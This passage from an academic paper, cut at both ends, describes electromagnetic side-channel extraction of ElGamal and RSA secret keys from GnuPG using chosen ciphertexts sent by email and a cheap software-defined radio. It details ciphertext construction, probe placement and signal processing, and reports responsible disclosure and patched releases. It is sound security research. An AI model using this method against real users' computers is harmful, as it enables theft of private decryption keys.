of writing this paper. We compiled GnuPG using the MinGW GCC version 4.6.2 [Min] and ran
it on Windows XP. GnuPG 2 .1 (developed in parallel to GnuPG 1.x), as well as its underlying
cryptographic library, libgcrypt (version 1 .6.2), utilize very similar cryptographic codes and thus
may also be vulnerable to our attack.
Following past attacks [GST14, GPT14], GnuPG now uses ciphertext randomization for RSA
decryption (but not for ElGamal; see Section 4). To test our attack on RSA with sliding-window
exponentiation, we disabled that countermeasure, making GnuPG decrypt the ciphertext directly
as in prior versions. The ElGamal attack applies to unmodified GnuPG.
Current Status. Following the practice of responsible disclosure, we worked with the authors
of GnuPG to suggest several countermeasures and verify their effectiveness against our attacks
(see CVE-2014-3591 [MIT14]). GnuPG 1.4.19 and Libgcrypt 1.6.3, resilient to these attacks, were
released concurrently with the public announcement of the results presented in this paper.
Chosen Ciphertext Injection. GnuPG is often invoked to decrypt externally-controlled inputs,
fed into it by numerous frontends, via emails, files, chat and web pages. The list of GnuPG
frontends [Gpgb] contains dozens of such applications, each of them can be potentially used in
order to make the target decrypt the chosen ciphertexts required by our attack. Morover, since
our attack is non-adaptive (the choice of ciphertext is fixed for all secret keys), such ciphertexts
can be quickly injected into the target using just a single communication round. Concretely, as
observed in [GST14, GPT14], Enigmail [Eni], a plugin for the Mozilla Thunderbird e-mail client,
1Signal quality varied dramatically with the target computer model and probe position. Computers of the same
model exhibited consistent optimal probe position, but slight differences in the emitted signals (which can be used
to distinguish between them).
5
automatically decrypts incoming emails by passing them directly to GnuPG. Thus, it is possible
to remotely inject such ciphertexts into GnuPG by sending them as a PGP/MIME-encoded e-
mail [ETLR01]. We have empirically verified that such an injection method does not have any
noticeable effect on the leakage signal produced by the target laptop. GnuPG’s Outlook plugin,
GpgOL, also did not seem to alter the target’s leakage signal.
1.4 Related Work
Side-channel attacks have been demonstrated on numerous cryptographic implementations and via
various leakage channels (see [And08, MOP07, KJJR11] and the references within).
The EM Side Channel. The electromagnetic side channel, specifically, has been exploited
for attacking smartcards, FPGA and other small devices (e.g., [QS01, GMO01, AARR02]). On
PCs, [ZP14] observed electromagnetic leakage from laptop and desktop computers (but did not
show cryptanalytic applications), and [GPT14] demonstrated successful EM attacks on a side-
channel protected PC implementation of the square-and-multiply modular exponentiation algo-
rithm, achieving RSA and ElGamal key extraction.
Attacks on Sliding Window Modular Exponentiation. While most side-channel attacks on
public key schemes focus on variants of the square-and-multiply modular exponentiation algorithm,
several focus on attacking sliding window modular exponentiation on small devices (sampling much
faster than the target device’s clockrate). These attacks either exploit high-bandwidth operand-
dependent leakage of the multiplication routine [Wal01, CFG+10, HMA+08, HIM+13] or utilize the
fact that it is possible to distinguish between squarings and multiplications [FKM+06, CRI12].
Neither of the above approaches fits our case. The first requires very high-bandwidth leak-
age, while the second is blocked by a recently-introduced countermeasure to the attack of [YF14]:
GnuPG uses the same code for squaring and multiplications (and the resulting EM leakage indeed
appears indistinguishable at low bandwidth).
Side-channel Attacks on PCs. Physical side-channel attacks of PCs were demonstrated by
observing leakage through the USB port [OS06] or through the power outlet [CMR+13]. Key
extraction side-channel attacks have been presented on PC computers, utilizing the timing dif-
ferences [BB05] and cache access patterns [Ber05, Per05, OST06]. Recently, low-bandwidth key-
extraction attacks that utilize physical channels such as sound [GST14] and chassis potential [GPT14]
were demonstrated on GnuPG running on PCs.
Cache Attacks in GnuPG. Yarom and Falkner [YF14] presented an L3 cache attack on the
square-and-multiply algorithm, achieving key extraction by directly observing the sequence of squar-
ings and multiplications perform. In a concurrent work, Yarom et al. presented [YLG+15] an attack
on sliding-window exponentiation by observing the access patterns to the table of ciphertext powers.
1.5 Preliminaries
ElGamal Encryption. Recalling notation, in the ElGamal encryption [ElG85] key generation
consists of generating a large prime p, a generator gofZ∗
p, and a secret exponent χ. The public
key is (p,g,gχ) and the secret key is χ. Encryption of a message moutputs a pair ( γ,δ), where
γ=gsmodpandδ=m·(gχ)smodp, ands∈Z∗
pis random. A ciphertext ( γ,δ) is decrypted by
computing the exponentiation γ−χ, and then multiplying by δmodulop. GnuPG selects the prime
pto be a random safe prime , meaning that p= 2p′+ 1 for some prime p′.
RSA Encryption. In RSA encryption [RSA78] the key generation consists of selecting two
large randomly chosen primes p,q, a (fixed) public exponent e, and a secret exponent dsuch that
6
ed≡1 (modφ(n)) wheren=pq. The public key is ( n,e) and the secret key is ( d,p,q ). RSA
encryption of a message mis performed by computing memodn. RSA decryption of a ciphertext
cis performed by computing cdmodn. GnuPG uses an optimization of RSA that is based on the
Chinese Remainder Theorem (CRT). That is, in order to compute m=cdmodn, GnuPG first
computes the two exponentiations mp=cdpmodpandmq=cdqmodq(wheredpanddqare
derived from the secret key) and then combines mpandmqintomusing the CRT.
2 Cryptanalysis
This section describes our cryptanalytic attack techniques (the applicability of which we demon-
strate in Section 3). We begin by reviewing the GnuPG modular exponentiation algorithm (Sec-
tion 2.1) and proceed by describing our attack on ElGamal decryption (Section 2.2) and on RSA
decryption (Section 2.3).
2.1 GnuPG’s Sliding-Window Exponentiation Routine
GnuPG uses an internal mathematical library called MPI (based on GMP [Gmp]) in order to
perform the large integer operations occurring in ElGamal decryption. In recent versions (starting
with GnuPG v1.4.16), this exponentiation is performed using a sliding-window algorithm, as follows.
MPI stores large integers as arrays of limbs , which are 32-bit words (on the x86 architecture used
in our tests). Algorithm 1 is a pseudocode of the modular exponentiation routine, which operates on
such limb arrays (simplified for the case of 32-bit limb size). The function sizeinlimbs (x) returns
the number of limbs in the t-bit number x, namely ⌈t/32⌉. The functions count leading zeros (x)
andcount trailing zeros (x) count the number of leading and trailing zero bits in x respectively.
Finally, shift left (x,y) and shift right (x,y) respectively shift x to the left or to the right y bits.
For 3072-bit ElGamal keys, GnuPG chooses the key so that the exponent d=−χ(using the
notation of Section 1.5) is about 400 bits, and thus w= 4. For 4096-bit RSA keys, the size of both
pandqis 2048 bits. Since GnuPG’s RSA uses the CRT, the exponents dpanddqare also 2048
bits long; hence, w= 5.
Consider the computation in lines 14–18. For a fixed value of w, this computes a table indexed
by 1,3,5,...,2w−1 (i.e., 2w−1entries in total), mapping each such odd w-bit integer uto the group
elementgu. Moreover, note that this computation only depends on the ciphertext and the modulus
and not on the secret exponent. We will show how to exploit this table to create exponent-dependent
leakage during the main loop of Algorithm 1, leading to full key extraction.
2.2 ElGamal Attack Algorithm
We start by describing the attack algorithm on GnuPG’s ElGamal implementation, which uses
sliding-window exponentiation. At the end of the section we discuss the fixed-window version.
LetSM-sequence denote the sequence of squaring and multiplication operations in lines 25,
29 and 32 of Algorithm 1. Note that this sequence depends only on the exponent d, and not
on the value of gorp. If an attacker were to learn the SM-sequence, and moreover obtain for
each multiplication performed by line 29 the corresponding table index uused to index the table
computed in lines 14-18, then the secret exponent could be easily recovered as follows. Start from a
partial exponent set to 1. Then, going over the SM-sequence from start to end, for every squaring
operation in the SM-sequence append a zero bit to the partially-known exponent. Whenever a
7
Algorithm 1 GnuPG’s modular exponentiation (see function mpipowm inmpi/mpi-pow.c).
Input: Three integers g,dandpwhered1···dnis the binary representation of d.
Output:a≡gd(modp).
1:procedure mod exp(g,d,p )
2: ifsizeinlimbs (g)>sizeinlimbs (p)then
3:g←gmodp
4: ifsizeinlimbs (d)>16then ⊿computew, the window size
5:w←5
6: else if sizeinlimbs (d)>8then
7:w←4
8: else if sizeinlimbs (d)>4then
9:w←3
10: else if sizeinlimbs (d)>2then
11:w←2
12: else
13:w←1
14:g0←1,g1←g,g2←g2
15: fori←1to2w−1−1do ⊿precompute table of small powers of g
16:g2i+1←g2i−1·g2
17: ifsizeinlimbs (g2i+1)>sizeinlimbs (p)then
18: g2i+1←g2i+1modp
19:a←1
20:j←0
21: whiled̸= 0do ⊿main loop for computing gdmodp
22:j←j+count leading zeros (d)
23:d←shift left (d,j)
24: fori←1toj+wdo
25: a←a·amodp ⊿ using multiplication, not squaring
26:t←d1···dw
27:j←count trailing zeros (t)
28:u←shift right (t,j)
29:a←a·gumodp
30:d←shift left (d,w)
31: fori←1tojdo
32:a←a·amodp ⊿ using multiplication, not squaring
33: returna
34:end procedure
multiplication operation is encountered in the SM-sequence, replace the least significant bits of the
exponent with the table index ucorresponding to the multiplication.
Revealing the Locations of a Table Index. We now discuss how, for any given table index
u, the attacker can learn the locations where multiplications by gu, as performed by line 29, occur
inside the SM-sequence. In what follows, for any given table index u, we shall refer to such locations
asSM-locations. Recall that for 3072-bit ElGamal, GnuPG sets w= 4 inside Algorithm 1, so the
table indices are odd 4-bit integers.2Thus, given an odd 4-bit integer u, the attacker chooses
2To reduce the table size, GnuPG’s code actually maps an odd 4-bit table index u= 2u′+ 3 to a 3-bit index u′, to
8
the ciphertext so that multiplications by guproduce different side-channel leakage compared to
multiplications by gu′for allu′̸=u.
First, the attacker selects a number y∈Z∗
pcontaining many zero limbs and computes its u-th
root, i.e.,x, such that xu≡y(modp).3It is likely that for all other odd 4-bit integer u′̸=u,
there are few zero limbs in xu′modp(otherwise, the attacker selects a different yand retries).
Finally, the attacker requests the decryption of ( x,δ) for some arbitrary value δand measures the
side channel leakage produced during the computation of mod exp(x,d,p ).
Distinguishing Between Multiplications. The above process of selecting xgiven an odd 4-bit
integeruallows an attacker to distinguish between multiplications by guand multiplications by
gu′for allu′̸=uduring the main loop of mod exp(x,d,p ). Indeed, note that by the code of
Algorithm 1 we have that gu=xumodp=y, which is a number containing many zero limbs.
Conversely, for any u′̸=uwe have that gu′=xu′modpis a number containing few (if any) zero
limbs. The number of zero limbs in the second operand of the multiplication can be detected via
side channels, as observed by [GST14, GPT14] and summarized in Section 2.4. Thus, by observing
the leakage of the multiplication routine, it is possible to distinguish the multiplications by guin
line 29 of Algorithm 1 from multiplications by gu′whereu′̸=u.
The above allows the attacker to distinguish between multiplications by guand multiplications
bygu′for allu′̸=uduring mod exp(x,d,p ). In order to determine the SM-locations of gu, it
remains for the attacker to distinguish the multiplications by gufrom the squarings performed in
lines 25 and 32. GnuPG implements the squaring in lines 25 and 32 using the same multiplication
code used for line 29 (this is a countermeasure to the attack of [YF14]). Thus, the attacker cannot
immediately distinguish between the leakage produced by the squaring operations and the leakage
produced by multiplication operations where the second operand is gu′for someu′̸=u. However,
in the case of squaring, the argument asupplied to the multiplication routine is a random-looking
intermediate value, which is unlikely to contain any zero limbs. Thus, the squaring operations will
produce similar leakage to that produced by multiplications by gu′for someu′̸=u. So the attacker
cannot yet distinguish between multiplications by gu′(u′̸=u) and squaring operations, he can
nonetheless determine the SM-locations of gu.
Key Extraction. Applying this method to every possible table index u(sinceuis an odd 4-bit
number, only 8 possible values of uexist), the attacker learns the SM-locations of multiplications
performed in line 29. Moreover, since each ciphertext corresponds to only a single table index
u, the attacker also learns the value of uused during these multiplications. All that remains for
the attacker to learn in order to recover the secret exponent is the SM-locations of the squaring
operations performed by lines 25 and 32 of Algorithm 1. However, since at this point the SM-
locations of all multiplication operations have been identified, any remaining location corresponds
to a squaring operation performed by lines 25 and 32. Therefore, the attacker has learned the entire
SM-sequence performed by Algorithm 1 and moreover obtained, for each multiplication performed
by line 29, the corresponding value of the table index u, thus allowing him to recover the secret
exponent.
Figure 1 presents the number of zero limbs in the second operand of the multiplication routine
during the modular exponentiation routine, for each of our chosen ciphertexts and a randomly-
generated key. Note that for each ciphertext, the number of zero limbs increases only when its
store the table in a continuous array. For simplicity of exposition, we describe a direct mapping; this does not affect
our attack.
3The attacker computes the u-th root of ymodulo p, as follows. Since in GnuPG pis a large safe prime, for any
odd 4-bit integer uit holds that gcd(u, p−1) = 1, and therefore vcan be computed such that uv≡1 (mod p−1),
and then the u-th root is x=yvmodp.
9
 0 20 40 60 80 100
SS13SSSS5SS1SSSSSS5SSS3SSSSSS9SS1SSSSSSSSSS7SSSSS5SSS1SSSSSSNumber of zero limbs
Sequence of squarings and multiplicationsFigure 1: Number of zero limbs in the operand of the multiplication routine during an execution
of the modular exponentiation routine, using our ElGamal attack and a randomly-generated key.
Each squaring is marked by Sand each multiplication is marked by the corresponding table index
uof its second operand. For each chosen ciphertext, when its corresponding table index is used,
there are 94 zero limbs in the second operand of the multiplication routine.
corresponding table index, u, is used. Across all ciphertexts, it is possible to deduce the exact SM-
sequence and moreover to obtain, for each multiplication performed by line 29, the corresponding
value of the table index u, and then (as discussed above) deduce the exponent.
Attacking the Fixed-Window Method. The fixed-window ( m-ary) exponentiation method
(see [MVO96, Algorithm 14.109]) avoids the key-dependent shifting of the window, thus reducing
side-leakage leakage. The exponent is split into contiguous, fixed-size m-bit words. Each word
is then handled in turn by performing msquaring operations and a single multiplication by an
appropriate value selected from a precomputed table using the current exponent word as the table
index.
In attacking fixed-window ElGamal, each table index umay be targeted similarly as in the
sliding window case by having the attacker select a number y∈Z∗
pcontaining many zero limbs and
compute the u-th root of y,x, such that xu≡y. Like in the sliding window case, for any other
m-bit wordu′̸=u, it is likely that xu′modpwill contain few (if any) zero limbs. The remainder
of the attack—leakage analysis and key extraction—is the same as for sliding window.
2.3 RSA Attack Algorithm
As in the case of ElGamal, the security of RSA also breaks down if the secret exponent dleaks.
Moreover, even leakage of the top half of the bits of dp(or ofdq) allows for a complete key
recovery [Cop97]. In this section, we show how to adapt the ElGamal attack presented in Section 2.2
to RSA. As before, we first describe the attack algorithm on GnuPG’s RSA implementation, which
uses sliding-window exponentiation, and the end of the section we discuss the fixed-window version.
Revealing the Location of Table indices. In the case of 4096-bit RSA, GnuPG uses a size of
w= 5 bits. Given an odd 5-bit table index u, the attacker would like to learn the SM-locations of
multiplications by guperformed during the modular exponentiation routine. However, unlike for
ElGamal, in this case the attacker does not know pand thus cannot select a number ycontaining
many zero limbs and compute xsuch thatxu≡y(modp). Neither can the attacker compute u-th
roots modulo Nto compute xu≡y(modN), as this would contradict the security of RSA with
public exponent u.
Approximating the Location of Table indices. However, locating the precise locations is not,
in fact, necessary: the requirements can be relaxed so that, given a 5-bit odd integer u, the attacker
will learn all the SM-locations of multiplication by gu′for someu′≤u. To this end, the attacker
10
no longer relies on solving modular equations over composite-order groups, but rather on the fact
that, during the table computation phase inside GnuPG’s modular exponentiation routine, as soon
as the number of limbs of some table value guexceeds the number of limbs in the prime p, the table
valueguis reduced modulo p(see line 17 of Algorithm 1). Thus, given a 5-bit odd integer u, the
attacker will request the decryption of a number tsuch thattcontains many zero limbs and that
tu≤22048<tu+1. The two above requirements are instantiated by computing the largest integer
ksuch thatk·u≤2048 and requesting the decryption of 2k. Finally, the side-channel leakage
produced during the computation of mod exp(2k,dp,p) is recorded.
Distinguishing Between Multiplication. Fix an odd 5-bit integer uand letkbe the largest in-
teger such that (2k)u≤22048. The SM-sequence resulting from the computation of mod exp(2k,dp,p)
contains three types of multiplication operations, creating two types of side-channel leakage.
1.Multiplication by gu′where u′≤u.In this case (2k)u′
≤(2k)u≤22048and therefore
gu′= 2k·u′modpdoes not undergo a reduction modulo p. Thusgu′= 2k·u′, which is a number
containing many zero limbs.
2.Multiplication by gu′where u′> u.In this case 22048<(2k)u′
and therefore gu′=
2k·u′modpundergoes a reduction modulo p, making it a random-looking number that will
contain very few (if any) zero limbs.
3.Multiplication resulting from squaring operations. As mentioned in Section 2.2, GnuPG
implements the squaring in lines 25 and 32 using the same multiplication code used for line 29. In
the case of squaring, the argument asupplied to the multiplication routine is a random-looking
intermediate value, which is unlikely to contain any zero limbs. Thus, the squaring operations
will produce similar leakage to case 2 above.
Next, as in the attack presented in Section 2.2, since the leakage produced GnuPG’s by multiplica-
tion routine depends on the number of zero limbs in its second operand (See [GST14, GPT14] and
Appendix 2.4 for an extended discussion), it is possible to distinguish between multiplications by
gu′for someu′≤u(case 1 above) and all other multiplications (cases 2 and 3 above). Thus, the
attacker learns the SM-locations of all multiplications by gu′whereu′≤u.
Key Extraction. The attacker applies the above method for every possible table index u(sinceu
is an odd 5-bit integer, only 16 possible values of uexist). He can thus deduce the SM-locations of
every multiplication performed by line 29. Moreover, for each multiplication, by finding the lowest
usuch that the leakage of the multiplication corresponds to case 1 above, the attacker deduces the
table index uof its second operand.
The attacker has now learned the sequence of table indices (i.e., odd 5-bit values) that occur as
the sliding window moves down the secret exponent dp. To recover the secret exponent, the attacker
need only discover the amounts by which the window slides between these values (due to runs of
zero bits in dp). This sliding is realized by the loops in lines 25 and 32 of Algorithm 1, and can thus
be deduced from the SM-locations of the squaring operations in lines 25 and 32. These SM-locations
are simply the remaining SM-locations after accounting for those of the multiplications in line 29,
already identified above. The attacker has now learned the position and value of all bits in dp.
Empirically illustrating the deduction (using a randomly generated secret-key), Figure 2 presents
the number of zero limbs in the second operand of GnuPG’s multiplication routine during the
modular exponentiation routine for each of our chosen ciphertexts. Note that for a ciphertext
corresponding to table index u, the number of zero limbs is greater than zero only in SM-locations
where there is a multiplication by gu′, whereu′≤u. From this data, it is possible to deduce the
exact SM-sequence and recover the exponent dp.
11
312927252321191715131197531
13SSSSS15SSSSSS27SSSSS29S1Sindex u of the second operand
Sequence of squarings and multiplications
Figure 2: Number of zero limbs in the operand of the multiplication routine during an execution
of the modular exponentiation routine, using our RSA attack and a randomly-generated key. Each
squaring is marked with an Sand each multiplication is marked with the corresponding table index
uof the second operand. For each multiplication, and for each ciphertext corresponding to some
table index u, the width of the corresponding bar is proportional to the number of zero limbs in the
second operand of the multiplication routine. For each chosen ciphertext corresponding to some
table index u, the number of zero limbs is greater than zero only when a table index u′≤uis used.
Attacking the Fixed-Window Method. As for ElGamal case, this attack can also be applied
to the fixed-window ( m-ary) exponentiation case. This is done by modifying the attack above to
approximate the location of all m-bit table indexes (as opposed to only odd m-bit indexes). The
remainder of the attack—leakage analysis and key extraction—is the same as for the sliding window
case.
2.4 Leakage from GnuPG’s Multiplication Routine
As mentioned in Section 2.2 and 2.3, the leakage produced by GnuPG’s multiplication routine varies
according to the number of zero limbs in its second operand. The root cause of this data-dependent
leakage, as exploited by our attacks, is located deep inside the code of GnuPG’s multiplication
routines. These routines were extensively analyzed in [GST14, GPT14]; the following is a simplified
analysis.
GnuPG’s large integer multiplication code uses two different multiplication algorithms: a vari-
ant of a recursive Karatsuba multiplication algorithm [KO62], and a simple grade-school “long
multiplication” algorithm. The chosen combination of algorithms is based on the size (in limbs) of
the second operand.
Basic Multiplication Routine. GnuPG’s basic multiplication routine is presented in Algo-
rithm 2. Note the optimizations for the case where a limb that equals 0 or 1 is encountered
inside the second operand b. In particular, if a zero limb is encountered, none of the operations
mulbysingle limb ,addwith offset , and mulandaddwith offset are performed, and
the loop in line 9 continues to the next limb of b. This particular optimization makes the control
flow (and thus side-channel leakage) depend on the operands of the multiplication routine.
This basic multiplication routine is used either directly from the modular exponentiation routine
(when the second operand is small), or serves as the base case for the following recursive Karatsuba
multiplication routine.
Karatsuba Multiplication Routine. Given two numbers, aandb, denote by aH,bHthe most
significant halves of aandbrespectively. Similarly, denote by aL,bLthe least significant halves of
12
Algorithm 2 GnuPG’s basic multiplication code (see functions mulnbasecase andmpihelp mulin
mpi/mpih -mul.c).
Input: Two numbers a=ak···a1andb=bn···b1of sizekandnlimbs respectively.
Output:a·b.
1:procedure mulbasecase (a,b)
2: ifb1≤1then
3: ifb1= 1then
4: p←a
5: else
6: p←0
7: else
8:p←mulbysingle limb (a,b 1) ⊿ p←a·b1
9: fori←2tondo
10: ifbi≤1then
11: ifbi= 1then ⊿(and ifbi= 0 do nothing)
12: p←addwith offset (p,a,i ) ⊿ p←p+a·232·i
13: else
14: p←mulandaddwith offset (p,a,bi,i) ⊿ p←p+a·bi·232·i
15: returnp
16:end procedure
aandbrespectively. GnuPG’s Karatsuba multiplication routine relies on the following identity:
ab= (22n+ 2n)aHbH+ 2n(aH−bL)(bL−aH) + (2n+ 1)aLbL.
Operand-Dependent Leakage. Both the ElGamal and RSA attacks utilize the same side-
channel weakness in GnuPG’s basic multiplication routine. This weakness allows the attacker to
distinguish multiplications where the second operand contains many zero limbs from multiplications
where it does not. Moreover, if the second operand does contain many zero limbs, then the second
operand in all three recursive calls for computing aHbH, (aH−bL)(bL−aH) andaLbLperformed
by GnuPG’s variant of the Karatsuba multiplication algorithm will also contain many zero limbs.
Then, as the recursion eventually reaches its base case, most of the calls to mulbysingle limb ,
addwith offset andmulandaddwith offset inside the basic multiplication routine will
be skipped. Conversely, if the second operand of the multiplication routine is random looking, so
will be the second operand in all three recursive calls during GnuPG’s Karatsuba multiplication
routine. This in turn will cause the basic multiplication routine to execute most of the calls
tomulbysingle limb ,addwith offset andmulandaddwith offset . Finally, since the
basic multiplication routine is executed many times during the modular exponentiation routine, this
drastic change inside its control flow creates side-channel leakage observable by even low-bandwidth
means.
13
3 Experimental Results
This section presents experimental key extraction using the above cryptanalytic attack, via the elec-
tromagnetic side channel, using inexpensive Software Defined Radio (SDR) receivers and consumer
radios.
3.1 SDR Experimental Setup
Our first experimental setup uses Software Defined Radio to study EM emanations from laptop
computers at frequencies of 1.5–2 MHz, as detailed below (see also Figure 3).
Probe. As a magnetic probe, we constructed a simple shielded loop antenna using a coaxial
cable, wound into 3 turns of 15 cm diameter, and with suitable conductor soldering and center
shield gap [Smi99]. (For the compact untethered setup of Section 3.6 we used a different antenna,
described there.)
Receiver. We recorded the signal produced by the probe using a FUNcube Dongle Pro+ [Fun]
SDR receiver. The FUNcube Pro+ is an inexpensive (GBP 125) USB dongle that contains a
software-adjustable mixer and a 192 Ksample/sec ADC, accessed via USB as a soundcard audio
interface. We used the GNU Radio software [Gnu] to interface with this receiver. Numerous
cheaper alternatives exist, including “rtl-sdr” USB receivers based on the Realtek RTL2832U chip
(originally intended for DVB-T television receivers) with a suitable tuner and upconverter; the
Soft66RTL2 dongle [RTL] (USD 50) is one such example.
Probe Placement. The placement of the EM probe relative to the laptop greatly influences
the measured signal and noise. We wished to measure EM emanations close to the CPU’s voltage
regular, located on the laptop’s motherboard, yet without mechanical intrusion. In most modern
laptops, the voltage regulator is located in the rear left corner, and indeed placing the probe close
to this corner usually yields the best signal. With our loop antennas, the best location is parallel
to the laptop’s keyboard for close distances (up to approximately 20 cm), and perpendicular to the
keyboard for larger distances; see Figures 3, 9 and 11 for examples.
Exponent-Dependent Leakage. To confirm the existence of leakage that depends on the (secret)
exponent, we first show how different exponents cause different leakage. Figure 4 demonstrates
ElGamal decryption operations using different secret exponents, easily distinguishable by their
electromagnetic leakage. Similar results were obtained for RSA.
3.2 Signal Analysis
Demodulation. As can be seen in Figure 4, when using periodic exponents the leakage signal
takes the form of a central peak surrounded by distinguishable side lobes. This is a strong indication
that the secret bit exponents are modulated by the carrier. As in [GPT14], the carrier signal turned
out to be frequency modulated, though in our case the baseband signal does not directly represent
the key bits.
Different targets produce such FM-modulated signals at different, and often multiple, frequen-
cies. In each experiment, we chose one such carrier and applied a band-pass filter around it: first
via coarse analog RC and LC filters (some built into the SDR receiver), and then via a high-order
digital band-pass filter. We then demodulated the filtered signal using a discrete Hilbert transform
and applied a low-pass filter, yieldinga demodulated trace as shown in Figure 5(a).
14
Figure 3: A shielded loop antenna (handheld) connected to the the attacker’s computer through
an SDR receiver (right), attacking a Lenovo 3000 N200 target (left).
Signal Distortions. In principle, only a single demodulated trace is needed per chosen ciphertext,
if measurment is sufficiently robust. However, the signals obtained with our setup (especially those
recorded from afar) have insufficient signal-to-noise ratio for reliable information extraction.
Moreover, there are various distortions afflicting the signal, making straightforward key extrac-
tion difficult. The signals are corrupted every 15 msec, by the 64 Hz timer interrupt on the target
laptop. Each interrupt event corrupts the trace for a duration of several exponent bits, and may
also create a time shift relative to other traces (see Figures 5(b) and 6(a)). In addition, many traces
exhibit a gradual drift, increasing the time duration between two adjacent peaks (relative to other
traces), making signal alignment even more problematic (see Figure 6(b)).
The attack of [GPT14], targeting square-and-always-multiply exponentiation, overcame inter-
rupts and time drift using the fact that every given stage in the decryption appears in non-corrupted
form in most of the traces. They broke the signal down into several time segments and aligned
them using correlation, thereby resolving shift issues. Noise was suppressed by averaging the
aligned segments across all signals. Since, in their case, the baseband signal reflected a sequence of
random-looking key bits, correlation proved sufficient aligning trace segments.
However, such correlation-based alignment and averaging is inadequate for sliding-window ex-
ponentiation. Here, the demodulated traces are mostly periodic, consisting of a train of similar
peaks that change only when the corresponding table index is used for multiplication. Correlat-
ing nearly-periodic signals produces an ambiguity as to the actual shift compensation required for
proper alignment; it is also not very robust to noise.
The problem is exacerbated by the low bandwidth of the attack: had we (expensively) performed
clockrate-scale measurments, consecutive peaks would likely have been distinguishable due to fine-
grained data dependency, making alignment via segment correlation viable.
Aligning the Signals. As a first attempt to align the signals and correct distortions, we applied
the “Elastic Alignment” [vWWB11] algorithm to the demodulated traces; however, for our signals
the results were very unreliable. For more robust key extraction, we used a more problem-specific
algorithm.
Initial Synchronization. We started by aligning all traces belonging to identical decryption
operations using a short segment in the very beginning of each trace, before the start of the
modular exponentiation operation. This segment is identical in all traces, making it suitable as
a trigger for the alignment. All traces were aligned via correlation relative to a reference trace,
15
0xFD
0xFDFF
0xFDFFF
unalteredFigure 4: EM measurement (0 .5 sec, 1.49–1.57 MHz) of four GnuPG ElGamal decryptions executed
on a Lenovo 3000 N200 laptop. In the first 3 cases, the exponent is overridden to be the 3072-bit
number obtained by repeating the bit pattern written to the right. In the last case, the exponent
is unaltered. In all cases, the modulus pis the same and the ciphertext cis set to be such that
c15≡23071(modp). Note the subtly different side lobes around the 1527 kHz carrier.
chosen randomly from within the trace set. If by some chance this initial segment was distorted
in the chosen reference trace, the reference trace was discarded and a new one chosen. Traces that
did not align well with the reference trace were also discarded. This process required a few dozen
decryption traces per window (taking a few seconds total) in order to produce enough valid traces
for reliable key extraction. We then independently compared each trace against the reference trace,
correcting any distortion as soon as it manifested by changing the signal accordingly, as described
next. This is possible because not all interrupts occur at the exact same time, and no two drifts
are the same.
Handling Interrupts. In order to align the signals despite the interrupt-induced shifts, a search
for interrupts was performed simultaneously across both the current signal and the reference signal,
from beginning to end. Interrupts are easily detected, as they cause large frequency fluctuations.
Whenever an interrupt was encountered in one of the signals, the relative delay it induced was
estimated by correlating a short segment immediately following the interrupt in both signals. The
samples corresponding to the interrupt duration were then removed from the interrupted signal,
to restore alignment. The process was repeated until no more interrupts were detected in either
signal and the signals were fully aligned. Note that the delay created by the interrupts was usually
shorter than the peaks in the demodulated trace, so there was no ambiguity in the correlation and
resulting delay estimate.
Handling Drifts. The slow drifts were handled by adding another step to the above process.
Between each pair of detected interrupts, we performed a periodic comparison (again, by direct
correlation) and compensated for the drift by removing samples from the appropriate signal (as
done for interrupts). In order to avoid ambiguity in the correlation, the comparisons were made
frequently enough so that the slow drift never created a delay longer than half a peak.
Aggregating Aligned Traces. The foregoing process outputs several fully-aligned but noisy
traces that still contain occasional interrupts (since the interrupt duration is usually several peaks
long but creates a delay of no more than one peak, the compensation process does not completely
16
(a) A segment of the demodulated trace. Squaring
is marked by Sand multiplication is marked by the
corresponding table index u(here, 0xDor0xF). Note
that multiplications where u=0xFcause dips. Itera-
tions of the main loop of Algorithm 1 are marked by
vertical black lines.
(b) Demodulation of the signal obtained during the entire
decryption. The interrupts, occurring every 15 ms, are
marked by green arrows.
Figure 5: Frequency demodulation of the first leakage signal from Figure 4. The exponent is
overridden to be the 3072-bit number obtained by repeating the bit pattern 0xFD , and the ciphertext
cis set to be such that c15≡23071(modp).
(a) Red signal shifted due to the interrupt
 (b) Red signal drifted relative to blue signal
Figure 6: FM demodulation of an EM measurement around a carrier of 1 .5 MHz during two
ElGamal decryptions of the same ciphertext and same (randomly-generated) key.
remove the interrupt itself). In order to obtain a clean and disruption-free aggregate trace , the
signals were combined and filtered via a mean-median filter hybrid. At each time point, the
samples from all different traces were sorted, and then the highest and lowest several values were
discarded. The remaining values were consequently averaged, resulting in an interrupt free trace
(see Figure 7(a)).
Note that even after we combined several aligned traces, the peak amplitudes across each
aggregate trace varied greatly. To facilitate peak detection and thresholding, the peak amplitudes
were equalized using the following procedure. First, an AM demodulation of the aggregate trace
was performed by taking the absolute value of its Discrete Hilbert Transform. The result was then
low-pass-filtered and smoothed using a Gaussian window, resulting in an outline of the envelope.
The trace was then divided by its envelope to complete equalization. See Figure 7(b).
17
(a) Before peak amplitudes equalization (the horizontal
axis is given in miliseconds)
(b) After peak amplitudes equalization (the horizontal axis
is given in miliseconds)
(c) After peak detection (the horizontal axis is the peak/dip
number and the vertical axis is “high” for peaks and “low”
for dips)
Figure 7: Three aggregate traces, corresponding to table indices u= 1,3,5 obtained during our
ElGamal attack using a randomly-generated key.
3.3 ElGamal Key Extraction
When attacking ElGamal following the method of Section 2.2, we first iterated over the 8 table
indices, and for each measure and aggregate multiple traces of decryptions of that ciphertext. This
resulted in 8 aggregate traces, which were further processed as follows.
Peak Detection. For each aggregate trace corresponding to a table index u, we derived a vector
of binary values representing the peaks and dips in this trace. This was done by first detecting,
in the aggregate trace, all local maxima exceeding some threshold amplitude. The binary vector
then contains a bit for every consecutive pair of peaks, set to 1 if the peaks are close (below some
time threshold), and set to 0 if they are further apart, meaning there is a dip between them; see
Figure 7(c).
Revealing the ElGamal SM-sequence. Observing that dips occur during multiplication by
operands having many zero limbs, coupled with the analysis of Section 2.2, we expect the 0 value to
appear in this vector only at points corresponding to times when multiplication by guis performed.
18
Across all ciphertexts, these binary vectors allow the attacker to deduce the exact SM-sequence
and, moreover, to obtain, for each multiplication performed by line 29 of Algorithm 1, the corre-
sponding value of the table index u. As explained in Section 2.2, the key is then easily deduced.
Overall Attack Performance. Applying our attack to a randomly-generated 3072-bit ElGamal
key by measuring the EM emanations from a Lenovo 3000 N200 laptop, we extracted all but the first
bit of the secret exponent. For each chosen ciphertext, we used traces obtained from 40 decryption
operations, each taking about 0.1 sec. We thus measured a total of 8 ·40 = 320 decryptions.
3.4 RSA Key Extraction
Analogously to the above, when attacking RSA following the method of Section 2.3, we first ob-
